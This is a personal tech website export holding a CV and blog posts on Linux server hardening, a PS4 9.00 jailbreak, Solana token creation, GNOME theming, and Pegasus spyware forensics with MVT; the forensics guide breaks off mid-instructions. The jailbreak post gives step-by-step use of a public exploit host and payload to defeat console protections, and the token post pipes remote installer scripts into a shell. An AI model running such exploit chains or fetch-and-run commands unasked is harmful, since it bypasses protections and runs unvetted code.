[{"content":"Luka Piplica # Last updated on 16. October 2022 Basic Info # Website Link E-mail: lukapiplica@protonmail.ch Website: https://lukapiplica.github.io Github: https://github.com/lukapiplica LinkedIn: https://linkedin.com/in/lukapiplica Professional Summary # Results-oriented and adaptable IT professional with experience in customer service, technical support, PC maintenance, and system administration. Possess adeptness in implementing technology-based solutions for business problems, along with standards, procedures, and processes that improve business functionality.\nWork Experience # Radiotelevision of Bosnia and Herzegovina (BHRT) # January 2022 - September 2022 IT Support Specialist, Sarajevo.\nMade custom Windows installations with preinstalled client programs for maximum efficiency. Administered and supervised the company network. On-site, client-side helpdesk support for: Microsoft Office, Adobe products, Cinegy and other internal programs and systems. Maintenance and administration of the internet radio link for RTVFBIH. Setting up and configuring WiFi routers, L2 and L3 switches and Hubs, and network cabling and cable marking. Monitoring and maintenance of print servers and printers. Webmail database administration. Administration of ESET antivirus server. Deployed and maintained a locally hosted web server, FTP, as well as multiple SMB shares Education # ITAcademy # 2019-2021 Network Administrator, Sarajevo.\nGained knowledge and experience on Windows 10, Windows Server 2016, GNU/Linux and nagiOS operating systems. Learned how to configure and set up Cisco and MikroTik devices on a network. Learned Bash, Batch and PowerShell scripting. Gained the ability to create a very detailed report on cyber security, and measures on preventing cyber attacks, as well as implementing them. 
Certification # Name Credential ID Network Administrator 025056 Railway School Center # 2015-2019 Electronics Technician, Sarajevo.\nFirst year, improved knowledge on different electronic parts and perfected soldering skills. Second year, programmed an Arduino controlled basketball scoreboard via an HTML website. Third year, designed a solar panel tree with a built in bluetooth radio that can charge mobile phones. Group project - retro radio with a built in Nixie tube clock. Programmed and assembled a robotic arm controlled via an Android application. Gained the ability to create custom PCB boards. Fourth year, led a group of highschool students and together with them participated in designing and making an infinite mirror. Gained knowledge on old and current models of telecommunication. High School Activities # Chemistry Fundamentals of Electrical Engineering English Mathematics Certificates # Name of the competition Type Place Railway School Center Basics of Electrical Engineering School First IX Labor Fest State First X Labor Fest State First XI Labor Fest State First Note: These certifications were issued in real life, but I have a digital copy; if you want to see them feel free to email me! Volunteer Experience # Adair Café Bar # November 2021 - February 2022 Website Developer and Graphic Designer\nI developed a website for the coffee shop; I learned many things such as HTML, CSS and website optimization. In addition, while I was programming the website, I gained some experience with graphic design for creating a new logo, menu and promotional poster. 
This led me to gain experience in Adobe Photoshop and Adobe Illustrator programs.\nLink: https://adaircafebar.cf Languages # Human # Language Proficiency English Professional working Bosnian/Croatian/Serbian Native or bilingual German Elementary Machine # Language Markup Python HTML bash/shell LaTeX CSS Markdown All Certifications # Certificates Certificate ID ITAcademy Certified Computer Network Administrator 025056 Google Digital Garage 325 B49 2XV Udemy Learn to code with Python 3! UC-8aea5973-75b9-45f4-ac48-c2b3542c071e The Complete Python Hacking Course: Beginner to Advanced! UC-b268fbf0-8a81-4575-97a3-75876f56ab12 TryHackMe Complete Beginner Learning Path THM-PV3UWE6H73 TryHackMe CompTIA Pentest+ Learning Path THM-VJ140KARRQ TryHackMe Offensive Pentesting Learning Path THM-EUR7X51H4W TryHackMe Web Fundamentals Learning Path THM-CMQJCBRKFN TryHackMe Advent of Cyber 2020 THM-TVKIPRVSSQ References # Feel free to email me with your interest in me, and I\u0026rsquo;ll refer you to someone who can vouch for me. ","date":"14 October 2022","permalink":"/cv/","section":"Curriculum Vitae","summary":"Luka Piplica # Last updated on 16. October 2022 Basic Info # Website Link E-mail: lukapiplica@protonmail.ch Website: https://lukapiplica.github.io Github: https://github.com/lukapiplica LinkedIn: https://linkedin.com/in/lukapiplica Professional Summary # Results-oriented and adaptable IT professional with experience in customer service, technical support, PC maintenance, and system administration.","title":"Curriculum Vitae"},{"content":"","date":"14 October 2022","permalink":"/","section":"Luka Piplica","summary":"","title":"Luka Piplica"},{"content":" 👋 About Me👋 How it all started # Hi, my name is Luka. I\u0026rsquo;m a young network administrator and cybersecurity researcher. I\u0026rsquo;ve been into technology since I was little, and everything began with my first computer repair, a faulty RAM stick which I had to replace. 
After that I began experimenting with electronics inside PCs and after some time I got some basic level knowledge on how computers work.\nI gained more knowledge as time passed by and I started by being IT support for my family and friends, starting with instructions on how to use a computer, then moving to reinstalling operating systems, and after that I gained some basic A+ knowledge on computer systems.\nHigh School # I finished Railway School Center with the title of electrical technician. Thanks to many professors in this school, I gained new knowledge about various electronic components, telecommunication systems, etc.\nFirst Year # During the first year, I gained knowledge about electrical components (resistors, capacitors, coils, etc.) and improved my soldering skills. I won first place in the school competition in the subject Basics of Electrical Engineering. I also attended several high school sections including:\nelectrochemistry, English language, basics of electrical engineering, mathematics. Second Year # During the second year, I had the opportunity to work with a group of classmates on the project \u0026ldquo;Arduino Scoreboard\u0026rdquo;, which won us first place in the state competition (IX Labor Fest) in Hadžići.\nThe Arduino Scoreboard is made using an Arduino microcontroller, and a WiFi module that connects us to the HTML web page (which you can see on the laptop) and with it we control the numbers and time on the traffic light. The numbers are handmade from an LED strip that acts like seven-segment displays. Third year # During my third year, I learned to make my own PCBs and gained advanced knowledge about transistors. This year we had to make something for our final project, and I had the opportunity to work on an audio amplifier project.\nAs in the previous year, we participated in the X Labor Fest, which was held in Zenica. 
As a project we had a solar tree which brought us first place.\nFourth year # In the final year, we mostly learned about telecommunications, where I had a topic about radio receivers for my final work. The project we worked on for the XI Labor Fest is an LED desk programmed with an Arduino microcontroller to display patterns.\nThis project brought us the first place for the third year in a row.\nITAcademy # After graduating from high school, I decided to continue my knowledge of information technology at the ITAcademy in the field of network administration. Specifically CCNA (Cisco Certified Network Administrator) preparation, where I learned to set up and configure many network devices, as well as advanced knowledge in using Windows Server and Linux operating systems. After graduating from the ITAcademy, I decided to expand my current knowledge in the cybersecurity sector. I am currently first in Bosnia and Herzegovina on the TryHackMe table.\nMy hobbies # ⌨️ [Linux OS]\nAdvanced knowledge of using Linux operating systems, various distributions and advanced knowledge of the terminal and its commands. I opted for the Linux operating system because I like to experiment with different TWMs (Tiling Window Managers). I have used these distributions below:\nUbuntu Linux Debian Linux Pop!_OS Kali Linux Parrot OS Arch Linux Artix Linux Manjaro Linux Gentoo Linux 💿 [Electronics]\nI always experiment with electronics, from computers to cell phones, televisions, etc.\nIf something is broken I always try to disassemble and fix it myself, and if I don’t know something there is always a good friend called the Internet. I am also familiar with the hardware and software side of many electronic devices.\n🤖 [Cybersecurity]\nI spend most of my free time researching and reading about new hacker attacks and how that attack was carried out.\nIf it is some malware then I make a virtual machine and install the malicious file and then analyze it. 
What the file is currently doing on the system, what other files is it communicating with, what is it writing to memory, etc. This is exactly why I started this blog so I could document this process.\n📚 [Arduino programming]\nMany projects can be done on an Arduino microcontroller. The Arduino serves us as the brain of electronic components.\nIt’s also great for beginners who want to learn about electronics, but that doesn’t mean the Arduino is just meant for them. We can do many complex projects with this microcontroller.\n🖥️ [Raspberry Pi]\nThe Raspberry Pi is a small computer with a processor, memory, etc. It opens up a lot of new opportunities for even more complex projects than Arduino, such as: satellite tracking, arcade machines with old games, SNES (Super Nintendo) emulator, etc.\n💻 [Old consoles]\nI collect old game consoles and then do projects on them.\nAn example of a project I was working on is installing a Linux OS on a Nintendo 3DS. I also modify consoles like for example Xbox 360 with an RGH or JTAG chip.\n📁 [Digital privacy activist]\nIt has long been known that big companies like Google and Facebook are spying on us. They put us in a position where a normal citizen is monitored 24 hours a day. Unfortunately, in Bosnia and Herzegovina, the topic of digital privacy is not so much mentioned. Why do companies have the right to collect data about us at all?\nYour privacy, your control over your data and your freedom of speech on the internet!\nThank you for your time 💙 # ","date":"13 October 2022","permalink":"/about/","section":"About Me","summary":"👋 About Me👋 How it all started # Hi, my name is Luka. I\u0026rsquo;m a young network administrator and cybersecurity researcher. 
I\u0026rsquo;ve been into technology since I was little, and everything began with my first computer repair, a faulty RAM stick which I had to replace.","title":"About Me"},{"content":"","date":"9 October 2022","permalink":"/categories/","section":"Categories","summary":"","title":"Categories"},{"content":"\r🐧 How to protect a Linux server ! 🐧\rEveryone already knows you should protect a server and make it more secure. Well, here are some basic steps to take to protect your servers. Let\u0026rsquo;s get right into it:\nFirstly I would highly recommend using HTTPS protocol for your mirrors!\nI will assume you have a fresh install of a Linux server. Keep in mind these commands are focused on the apt package manager, but they should work with other package managers with minor changes.\nUpdating your server # After a fresh install, the first thing I do is update the server manually:\nsudo apt update sudo apt upgrade Enabling automatic updates # After updating my server manually, I usually enable automatic updates.\nKeep in mind that, depending on how critical the server is, you might not want updates to break it.\nTo enable automatic updates you need a package called unattended-upgrades!\nsudo apt install unattended-upgrades Then you have to enable it:\nsudo dpkg-reconfigure --priority=low unattended-upgrades Secure Shell (SSH) # Preparation # Usually, connecting to servers is done remotely via SSH protocol on the default port of 22.\nFirstly I will make a new folder called .ssh in my home directory if it doesn\u0026rsquo;t already exist.\nmkdir -p ~/.ssh Then we will give the folder permissions of 700, which blocks access by other users while the owner still has full access.\nchmod 700 ~/.ssh Now we want to log out of our server if we are connected via ssh.\nlogout Generating a solid Secure Shell key pair # Now let\u0026rsquo;s generate a Public and a Private key pair so we can safely connect to the server. 
I use the ed25519 algorithm since it\u0026rsquo;s fast and doesn\u0026rsquo;t compromise security.\nI would also recommend using a passphrase.\nWindows PowerShell: ssh-keygen -t ed25519 Linux Terminal: ssh-keygen -t ed25519 macOS Terminal: ssh-keygen -t ed25519 This will store the private and public keys in the .ssh folder of your home directory; depending on your OS, the folder might be hidden.\nCopying the public key to the server remotely # After the key pair is generated, we need to transfer the public key to the server; the private key stays on your own machine. I will use SCP to move the key to the server.\nWindows PowerShell: scp $env:USERPROFILE/.ssh/id_ed25519.pub SERVER_USER@SERVER_IP:~/.ssh/authorized_keys Linux Terminal: ssh-copy-id SERVER_USER@SERVER_IP macOS Terminal: scp ~/.ssh/id_ed25519.pub SERVER_USER@SERVER_IP:~/.ssh/authorized_keys Passwordless remote access and changing the default port # Now we need to lock down our ssh and disable passwords so you can only log in with the generated key pairs. We will log into our server and edit the ssh config file.\nOpening the config file:\nsudo nano /etc/ssh/sshd_config Let\u0026rsquo;s change the default port of 22. Uncomment the Port line, delete the number 22 and put something to your liking.\nUse higher numbers like 4723, for example.\nNow on the AddressFamily line, you can specify if you want to use IPv4, IPv6 or both. I disable IPv6, but you don\u0026rsquo;t have to. If you choose only to use IPv4, then replace any with inet\nDisable root login by replacing PermitRootLogin yes with PermitRootLogin no.\nThen disable password authentication by replacing PasswordAuthentication yes with PasswordAuthentication no\nNow save the changes!\nRestarting SSH to apply changes # After we made changes to the config file, we now need to restart the ssh service.\nsudo systemctl restart sshd NOTE: Make sure you have a connection by trying to connect from another terminal/PowerShell. If you make a mistake, you can lock yourself out! 
Enabling firewall # Firstly check your used ports by:\nsudo ss -tupln You might have other ports used, do your research, but I\u0026rsquo;ll only enable ssh so I can connect to the server.\nFirst, let\u0026rsquo;s install ufw.\nsudo apt install ufw I will use ufw as my firewall. Remember the last port we put in the config file of ssh. We need to allow it. Also, it is always recommended to specify what protocol the port uses, either TCP or UDP!\nsudo ufw allow SSH_PORT/tcp Then we need to enable the firewall.\nsudo ufw enable To check what rules are allowed, we can use the following:\nsudo ufw status Disable ICMP (ping) # Usually, the command ping is helpful for network administrators and hackers. The best practice is to disable ping!\nTo disable ping, we need to edit ufw config.\nsudo nano /etc/ufw/before.rules Under the section called ok icmp codes for INPUT, paste this line so it will be first (right under ok icmp codes for INPUT).\n-A ufw-before-input -p icmp --icmp-type echo-request -j DROP Reboot the server:\nsudo reboot now Ping has now been disabled!\nConclusion # The non-hackable server doesn\u0026rsquo;t exist! Keep in mind that every server is hackable, but this is a good practice you should consider trying to harden your server.\nThank you for your time 💙 # ","date":"9 October 2022","permalink":"/blog/how-to-protect-a-linux-server/","section":"Blogs","summary":"🐧 How to protect a Linux server ! 🐧\rEveryone already knows you should protect a server and make it more secure. 
Well, here are some basic steps to take to protect your servers.","title":"How to protect a Linux server"},{"content":"","date":"9 October 2022","permalink":"/categories/linux/","section":"Categories","summary":"","title":"Linux"},{"content":"","date":"13 June 2022","permalink":"/blog/","section":"Blogs","summary":"","title":"Blogs"},{"content":"","date":"21 April 2022","permalink":"/categories/consoles/","section":"Categories","summary":"","title":"Consoles"},{"content":"\r🎮 PS4 restoration and 9.00 Jailbreak 🎮\rLegal disclaimer: I plan on using this PS4 to install Linux on it and play with it out of curiosity. I do not condone piracy; this article is meant only for educational purposes! I am not held accountable for your actions! I bought a used PS4 Slim console to play with, and it was on 8.50 firmware and was never cleaned inside. The first thing I did was open it up to see what was \u0026ldquo;under the hood.\u0026rdquo; When I opened it up, I saw dust and when I turned it on the PS4 was so loud. That meant the thermal paste needed to be replaced, and the fans needed to be cleaned. Here is a picture of what was inside:\nI planned on installing Linux on this PS4, but that requires a jailbreak and a specific firmware version, and that is why I bought it with a low enough firmware version so I can upgrade it to 9.00.\nYou cannot downgrade firmware on the PS4; you can only upgrade it!\nWhat do you need:\nFormatted USB stick Thermal Paste Screwdrivers Rubbing Alcohol Patience Computer/Laptop Restoration: # Firstly I opened the PS4 up, unscrewed some screws, and this is what the insides looked like:\nNow I use rubbing alcohol to get rid of the old thermal paste.\nThe new thermal paste I applied is Arctic MX-4.\nAfter cleaning the fan and the heatsink, this is what the result looks like:\nMuch better!\n9.00 Jailbreak # After I assembled the PS4 Slim, I booted it up without Internet and did a factory reset by going into the Settings/Initialization/Initialize PS4. 
This option erased everything on the PS4 that was previously on, including games and accounts.\nNow comes the fun part, the jailbreak. Firstly go into Settings/System/Automatic Downloads and make sure to uncheck all boxes.\nAfter that, go to Settings/Network and uncheck the box that says Connect to the Internet. This option prevents the PS4 from downloading the latest firmware update.\nNow go to Settings/System/System Information and see your firmware version. I have the 8.50 version, so I need to update my PS4 to 9.00 manually.\nUpdating the PS4 to 9.00 # To update the PS4 to 9.00, you will need a USB drive and a PC. First, you have to get the 9.00 firmware. There are two websites one has faster downloads but requires a free account, and the second one has slower downloads but requires no account. Dark Software (faster downloads but requires an account) Darth Sternie (slower downloads but requires no account) Whichever you choose, make sure to download the 9.00 firmware.\nAfter the download, make sure to name the file PS4UPDATE.PUP\nNow, format it in exFAT to your USB drive.\nAfter your USB has done formatting, go to the root folder of your USB and make a new folder called PS4, go into that folder and create another new folder called UPDATE, and then inside the UPDATE folder, you are going to copy the PS4UPDATE.PUP file. Keep in mind that the folders have to be in all caps.\nNow eject the USB drive, go over to the PS4 and check your notifications and clear them!\nPlug your USB drive into PS4 and go to Settings/System Software Update, which should detect the update from your USB to 9.00. 
Follow the instructions on the screen and update the PS4.\nJailbreaking the PS4 # After you are on the 9.00 firmware version, go to Settings/Network and check the box we unchecked earlier, Connect to the Internet.\nNow go to the option below, Set Up Internet Connection. You can use either WiFi or Ethernet; then choose Custom. You can choose if you want DHCP or a static IP, then choose Do not specify for DHCP hostname and make sure to choose Manual for the DNS Settings!\nAs my primary DNS, I use 192.241.221.79, and as my secondary DNS, I use 165.227.83.145! These DNS IPs block all connections to Sony\u0026rsquo;s servers so that the PS4 will not accidentally get an update.\nAfter the DNS has been specified, click next and choose Automatic for MTU Settings and Do not use for Proxy Server.\nNow unplug the USB drive from the PS4 that had the 9.00 update file and plug it back into the PC.\nOn the PC, you will have to download Rufus and the exfathax.img from Github. Open Rufus, select your USB drive, and as the ISO, select the exFAThax.img file and click Start in Rufus.\nNow go to the PS4 and before you plug in your USB, open the PS4 web browser and make sure to clear all history and cache from it. After that, you can use a host you like that offers payloads.\nI use Karo218!\nNow, after you have cleared all your browsing history, cookies and data, go to the host and click on 9.00 Gold; you will have to wait for the exploit to cache itself for offline use. After it is finished, click on the GoldHenV2.2.4, and the exploit will tell you when to plug in your USB.\nWait for the payload to display the GoldHEN notification, and you have a jailbroken PS4.\nNOTE: If there are any errors or the console crashes, restart the PS4 and try again!\nThis Jailbreak is not persistent, which means after a shutdown or a reboot, you have to do everything again. One solution is to put your PS4 in rest mode, or you could make everything automatic, but it requires an ESP32-52 or a Raspberry Pi! 
Final result # Conclusion # Enjoyable project to do, especially since the price of the PS4 has dropped because of the PS5 release. Cleaning up the PS4 was satisfying, and I must say it is tricky to open the Slim model. Jailbreak was successful as expected, and for me, it worked almost 80% of the time, it had some crashes here and there, but a reboot fixed it. I am looking forward to installing Linux on the console.\nThank you for your time 💙 # ","date":"21 April 2022","permalink":"/blog/ps4-restoration-and-jailbreak/","section":"Blogs","summary":"🎮 PS4 restoration and 9.00 Jailbreak 🎮\rLegal disclaimer: I plan on using this PS4 to install Linux on it and play with it out of curiosity. I do not condone piracy; this article is meant only for educational purposes!","title":"PS4 restoration and 9.00 Jailbreak"},{"content":"","date":"22 January 2022","permalink":"/categories/cryptocurrency/","section":"Categories","summary":"","title":"Cryptocurrency"},{"content":" 💸 HSKY Token 💸 What is a Crypto Token ? # Today more and more people use cryptocurrencies; some famous ones are Bitcoin, Dogecoin, Ethereum, Solana etc. All these cryptocurrencies have their own blockchain. We are making a crypto token; unlike other popular cryptocurrencies with their own blockchain, crypto tokens work on blockchains of other cryptocurrencies. Specifically, we will use Solana because of the cheap fee when switching this token and the speed (Solana has a very fast blockchain, unlike the others).\nWhat is needed: # Operating system: Debian Linux Github profile Github Crypto exchange Binance Phantom wallet PhantomWallet Solflare Solflare NOTE: It is necessary to buy Solana! 
Instructions # We need to create a virtual machine and then install Debian Linux in the CLI (without a graphical interface).\nAfter installing Debian, the first thing you need to do is update the system.\nUpdating Debian # sudo apt update sudo apt upgrade Installing Solana\u0026rsquo;s tools # sh -c \u0026#34;$(curl -sSfL https://release.solana.com/v1.8.5/install)\u0026#34; Then type exit and log in to CLI again.\nCreating a Crypto Wallet # solana-keygen new Press enter twice, and you have successfully created a wallet.\nNOTE: The public key is your wallet address. Save the seed phrase somewhere in case you lose the wallet! Buying Solana # To make our token, we have to buy Solana. My recommendation is Binance.\nTransferring Solana: # After we buy Solana, it is located on Binance. We need to transfer it to the wallet on the virtual machine.\nNOTE: The address you are sending to from Binance is the public key we made in a virtual machine! After we have successfully transferred Solana, we want to see how many Solana we have in CLI; we type:\nsolana balance Installation of Rust # curl https://sh.rustup.rs -sSf | sh After clicking enter, press 1 for the default installation.\nType exit and log in to the virtual machine again.\nInstallation of required packages # sudo apt install libudev-dev libssl-dev pkg-config build-essential Installation of SPL # cargo install spl-token-cli Creating a crypto token # spl-token create-token Creating an account that will keep our token # spl-token create-account *TOKEN ID* NOTE: Token ID is a token that we got by entering the last command! Minting tokens and creating the number of tokens # spl-token mint *FIRST TOKEN ID* *NUMBER OF QUANTITIES* *SECOND TOKEN ID OF THE ACCOUNT* You have successfully created your token.\nTransferring your tokens to others: # To transfer your token to others, they must first make a wallet either on the phone or in a web browser. 
If you want to make a wallet on your phone, then Solflare is a great wallet, and if you\u0026rsquo;re going to make a wallet in a web browser, I suggest Phantom Wallet.\nspl-token transfer --fund-recipient --allow-unfunded-recipient *FIRST TOKEN ID* *HOW MUCH DO YOU WANT TO SEND* *WALLET ADDRESS TO WHICH WE WILL SEND OUR TOKENS* Solscan site # Solscan website: https://solscan.io/ We can paste the first TOKEN ID on this page to check our token.\nAdding a Token to the Solana registry # Firstly create an image for your token; it must be less than 200kb.\nMake a Github account.\nPlease create a new repository and upload an image of your token to that repository (name it logo.png).\nVisit https://github.com/solana-labs/token-list and fork it. Press . to open Visual Studio Code in your web browser. On the left, go to assets/mainnet right, click and create a new folder and paste the Token address.\nRight-click on the folder and click upload, then upload the image of your token.\nThen go to the src folder on the left, and you will see tokens folder, open the solana.tokenlist.json file.\nGo to the bottom of the file and then add your token in JSON format; it\u0026rsquo;s easiest to copy and paste the information from the token before yours and then change the values.\nOn the left, there is an icon with three dots; click on it, then add a message about what you\u0026rsquo;re doing and click on the checkmark.\nThen go back to Solana\u0026rsquo;s GitHub and request a pull request.\nDo the merge and wait for the process to end. Solana does a check every hour, so your pull request may only be received after an hour.\nFinal product # Conclusion # It is an exciting project; much can be learned, especially about cryptocurrencies and how they work. 
Currently, this project has no application and is not a project that can earn you money, but knowledge is enough.\nThank you for your time 💙 # ","date":"22 January 2022","permalink":"/blog/hsky-token/","section":"Blogs","summary":"💸 HSKY Token 💸 What is a Crypto Token ? # Today more and more people use cryptocurrencies; some famous ones are Bitcoin, Dogecoin, Ethereum, Solana etc. All these cryptocurrencies have their own blockchain.","title":"HSKY Token"},{"content":"\r💻 GNOME goes NORD configuration files 💻\rThese are my current dotfiles of Ubuntu Linux.\nThe installation will help you create the same look as in the pictures; here are the step-by-step instructions.\nSystem specifications:\nOS: Ubuntu GTK Theme: Nordic Icon Theme: Flatery_Dark Cursor Theme: Oreo_Blue Browser: Firefox Installation # I assume you have freshly installed Ubuntu 20.04 with minimal installation to start making this look.\nIf you are interested in what an application does, Wikipedia will help you.\nRepository upgrade and system upgrade # sudo apt update sudo apt upgrade Installation of Gnome Tweak Tool # We must first install the gnome tweak tool to install the gnome extensions.\nInstallation of Gnome Tweak Tool: sudo apt install gnome-shell-extensions Then open Firefox and go to LINK and download the add-on.\nDownload the necessary add-ons:\nAfter downloading the Gnome Extension add-on, we need to move the slider to On for a few add-ons; you can find them at the links below:\nDash to Panel User Themes Transparent Window Moving Then make sure they are included in the operating system by opening the Gnome Tweak Tool app and making sure the above add-ons are included; also, turn off the Desktop icons.\nNOTE: You can set Dash to Panel in the settings as you wish (to make icons smaller etc.). Also, my Transparent Window Moving setting is at 0.2. 
Installation of Pop Shell # sudo apt install git node-typescript make After installing the necessary dependencies, we need to go to the Downloads folder in the terminal.\ncd ~/Downloads Then we need to clone the repository:\ngit clone https://github.com/pop-os/shell.git Then we enter the shell folder:\ncd shell Installation of Pop Shell:\nmake local-install Installation of other applications # Installation of neofetch: sudo apt install neofetch Installation of zathura: sudo apt install zathura Installation of tty-clock: sudo apt install tty-clock Installation of cmatrix: sudo apt install cmatrix Installation of htop: sudo apt install htop Installation of ranger: sudo apt install ranger Installation of Vim: sudo apt install vim Installation of Lollypop: sudo apt install lollypop Installation of cbonsai: cd ~/Downloads sudo apt install libncursesw5-dev git clone https://gitlab.com/jallbrit/cbonsai cd cbonsai make install PREFIX=~/.local Installation of tty-tetris: cd ~/Downloads sudo apt install cmake git clone https://github.com/Holixus/tty-tetris-v2.git cmake . make sudo make install Installation of Cava: We first install the necessary dependencies:\nsudo apt install libfftw3-dev libasound2-dev libncursesw5-dev libpulse-dev libtool automake libiniparser-dev export CPPFLAGS=-I/usr/include/iniparser Then we go to the Downloads folder and clone the Cava repository:\ncd ~/Downloads git clone https://github.com/karlstav/cava.git Then we need to compile Cava:\ncd cava ./autogen.sh ./configure make Now we can install Cava:\nsudo make install Installation of Ttyper: sudo apt install cargo sudo apt install ttyper GRUB theme installation # Repository cloning: cd ~/Downloads git clone https://github.com/semimqmo/sekiro_grub_theme GRUB theme installation: sudo ./install.sh Various theme installation # GTK Theme: Nordic Icon Theme: Flatery_Dark Cursor Theme: Oreo_Blue NOTE: To install these themes, you need to create two hidden folders in the home directory. 
cd ~/ mkdir .themes mkdir .icons In the .themes folder, we need to insert the GTK theme and the Icon theme, and in the .icons, we need to insert the Cursor theme. Then we need to enable them from the Gnome Tweak Tools application.\nCreate or download an existing Startpage and add it to Firefox.\nChange Wallpaper through Gnome Tweak Tool.\nWikipedia # Now that we\u0026rsquo;ve made this GNOME configuration, it\u0026rsquo;s time to clarify what each application does.\n🧠 [Pop Shell]\nPop Shell gives us the option to use a tiling window manager on the Desktop system, which arranges the windows on the screen by a script and thus saves screen space.\n⌨️ [Neofetch]\nNeofetch is a command that gives us system specifications, plus it has a cool look.\n🍫 [Zathura]\nZathura is a PDF reader where it is possible to change the layout and many other options using a single configuration file.\n🐚 [Ranger]\nRanger serves us as a file manager in the terminal.\n📋 [Vim] text editor\nAs many people use notepad on Windows operating systems, we use nano and Vim.\nThe Nano text editor is much easier to use, while Vim is made more for developers because of its shortcuts.\n🌳 [cbonsai]\nCbonsai is a script that makes a tree of characters, letters and numbers in our terminal.\n🎮 [tty-tetris]\nTty-Tetris is an application that allows us to play Tetris on the terminal.\n📰 [ttyper]\nTtyper is an application that measures the typing speed in the terminal.\n🕶️ [Nordic] GTK theme.\nNordic Dark is a GTK theme (theme for user interface applications) that gives us a dark look at applications with a user interface.\n🔷 [Flattery] icon theme.\nAs the name itself says, applications that have a user interface mostly have icons that we can click with the mouse; this theme gives us a different look to the icons.\n🔵 [Oreo Blue] cursor theme.\nThis theme gives us a blue cursor look; it was inserted just for the looks and because it matches all the other colours of this operating system.\n🔥🦊 [Firefox] web 
browser.\nI use Firefox because it is one of the best privacy-oriented web browsers, in my opinion.\n⏰ tty-clock\nTty-clock is an application that aims to show the time and date in the terminal.\n🎚️ CAVA audio visualizer.\nCava is an application that serves as an audio visualizer.\n📈 HTop\nThe HTop application shows which processes are currently running and how much RAM they are using, and many other things. Think of HTop as a Task Manager in Windows.\n😎 CMatrix\nCMatrix is an application that is here just for looks, and its purpose is to print some text in an open terminal that aims to give a display of hacking from the Matrix movie.\n🤠 Ranger\nRanger is an application that allows us to see and access all files on the computer in the terminal.\n🍭 Lollypop\nLollypop is a music app; we play songs through it.\nThank you for your time 💙 # ","date":"19 October 2021","permalink":"/blog/gnome-ubuntu-nordic/","section":"Blogs","summary":"💻 GNOME goes NORD configuration files 💻\rThese are my current dotfiles of Ubuntu Linux.\nThe installation will help you create the same look as in the pictures; here are the step-by-step instructions.","title":"[GNOME] Ubuntu Nordic"},{"content":"","date":"21 July 2021","permalink":"/categories/cybersecurity/","section":"Categories","summary":"","title":"Cybersecurity"},{"content":" 🔍 NSO Pegasus Spyware 🔍 What is Pegasus Spyware? # Over the weekend, news leaked that several authoritarian governments (including Mexico, Morocco and the UAE) used spying software developed by the Israeli company NSO Group. Their goal was to spy on politicians, activists and journalists. 
A list of 50,000 telephone numbers potentially used for espionage has come into the possession of the Parisian non-profit organization Forbidden Stories and Amnesty International, which they shared with The Washington Post and The Guardian.\nAfter cyber security researchers analyzed several phones of victims of this attack, they discovered that it is a complex malware, which can access all data on the phone, from messages and phone calls to your photos, and worst of all, Pegasus allows its operator to record conversations and access the microphone and camera. This means this spyware can track you 24/7 and record whatever you say, do, and where you are.\nAlso, this spyware is made for both iOS and Android operating systems.\nHow Pegasus works? # Pegasus works using so-called \u0026ldquo;0-day exploits\u0026rdquo;. These are system errors that almost no one knows about, not even the companies behind operating systems, electronics, etc. A more straightforward explanation is that Apple doesn\u0026rsquo;t know that these bugs exist in the code, which is why there are \u0026ldquo;bug bounty\u0026rdquo; programs that cyber security researchers sign up for. They look for bugs in the system, and they are rewarded money depending on the impact of that bug. Of course, if cyber security researchers fail to detect code errors (bugs) before hackers with bad intentions do, this is a problem and contributes to the development of various malicious software such as Pegasus. As far as we know, it is enough to receive only one call or text message (which you do not have to click or answer) to get your iOS or Android device infected.\nHow to delete this spyware from your mobile device? # There is no way to remove Pegasus from your mobile device, but the best advice is to keep your mobile operating system constantly updated to the latest version. The last known version of iOS that is vulnerable to this hacking method is iOS 14.6.\nHow to detect Pegasus? 
# Pegasus is difficult to detect after it is installed on your mobile device, and it is designed to be deleted by itself in case it gets the wrong phone number or recognizes that the device has not been active for more than 60 days. There are currently several IOCs (Indicators of Compromise) that have been found, and you can find them on AmnestyTech Github .\nHow to do digital forensics on your device ? # Now I will show you how to do digital forensics on your device, with which you can check if you are infected with this spyware.\nRequired:\nOperating system: Kali Linux Program: MVT (Mobile Verification Toolkit) IOCs: AmnestyTech IOCs Instructions # After installing or booting the Kali Linux operating system into the virtual machine, the first thing we need to do is the system update.\nI use Kali Linux in this example, but any distribution based on Debian Linux should work with slight differences in commands.\nUpdating Kali Linux # We open the terminal and type the following commands:\nsudo apt update sudo apt upgrade Installation of MVT # We first need to install a few \u0026ldquo;dependencies\u0026rdquo; to make the MVT work properly.\nInstallation of dependencies: sudo apt install python3 python3-pip libusb-1.0-0 git Installation of MVT:\nAfter installing the dependencies, we install the MVT. First, we enter the Downloads directory.\ncd Downloads Then we have to download MVT from GitHub: git clone https://github.com/mvt-project/mvt.git We now enter the MVT directory we downloaded: cd mvt We now install MVT using this command: pip3 install . Adding a PATH variable: export PATH=$PATH:/home/*USERNAME*/.local/bin Note: USERNAME you need to change depending on the username on Linux. Downloading IOCs # We will first change the directory in the Downloads folder: cd ~/Downloads Then we clone the repository: git clone https://github.com/AmnestyTech/investigations.git Digital forensics on iOS devices. 
# If you have an iOS (Apple) device, follow the instructions below; if not, you can find instructions for Android systems under Digital Forensics on Android devices.\nA copy of your device\u0026rsquo;s system # The first step in this process is to back up the operating system files on the mobile device so we can analyze them. There are two methods: Filesystem dump and iTunes Backup.\nFilesystem dump is a method that requires jailbreaking the iOS system, which you can do using checkra1n (https://checkra.in/). The advantage of this method is that you can \u0026ldquo;dump\u0026rdquo; the entire system and use it to extract more data, but unfortunately, jailbreaking an iPhone voids the warranty, and some iPhones on specific iOS versions cannot be jailbroken.\niTunes Backup is an alternative option; although it extracts less data, it retains your device\u0026rsquo;s warranty.\nNOTE: You can extract more data with the iTunes Backup method if you use encrypted backup. Backup of iOS using iTunes # You can make an iTunes backup on a Windows device. Instructions:\nInstall iTunes on your computer or laptop. Connect iPhone with a cable to your computer or laptop. Open your iPhone in iTunes. If you want better results, then choose the encrypted backup option. Run a backup; it can take up to 30 minutes. Once the backup is complete, you can find its location on Windows 10 operating systems in one of two folders:\n%USERPROFILE%\\Apple\\MobileSync\\ %USERPROFILE%\\AppData\\Roaming\\Apple Computer\\MobileSync\\ The easiest way to find them is to paste %USERPROFILE% into the \u0026ldquo;Search\u0026rdquo; bar and check the folder manually. 
